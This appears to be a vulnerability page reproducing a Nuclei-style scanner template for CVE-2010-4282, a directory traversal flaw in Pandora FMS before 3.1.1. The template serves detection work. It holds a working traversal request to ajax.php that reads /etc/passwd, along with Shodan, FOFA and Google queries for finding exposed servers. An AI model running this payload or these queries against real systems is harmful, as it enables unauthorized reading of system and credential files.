CVE-2010-4282: Pandora Fms < 3.1.1 - Directory Traversal

2025-08-01 phpShowtime 2.0 PoC Public

Description

Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.

PoC

id: CVE-2010-4282

info:
  name: Pandora Fms < 3.1.1 - Directory Traversal
  author: daffainfo
  severity: high
  description: |
    Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/15643
    - https://nvd.nist.gov/vuln/detail/CVE-2010-4282
    - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
    - http://www.exploit-db.com/exploits/15643
    - http://seclists.org/fulldisclosure/2010/Nov/326
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-4282
    cwe-id: CWE-22
    epss-score: 0.19647
    epss-percentile: 0.97253
    cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: artica
    product: pandora_fms
    shodan-query: http.title:"pandora fms"
    fofa-query: title="pandora fms"
    google-query: intitle:"pandora fms"
  tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100de6fd57fa04dc789a11facf96d0305b3ef1473eb6f44a3ee7b567c0a10f708d9022100f8b8523ba2788d4c54bcafb101ebfcfab095cbe9e5cce367837da1cb1aa77a7a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities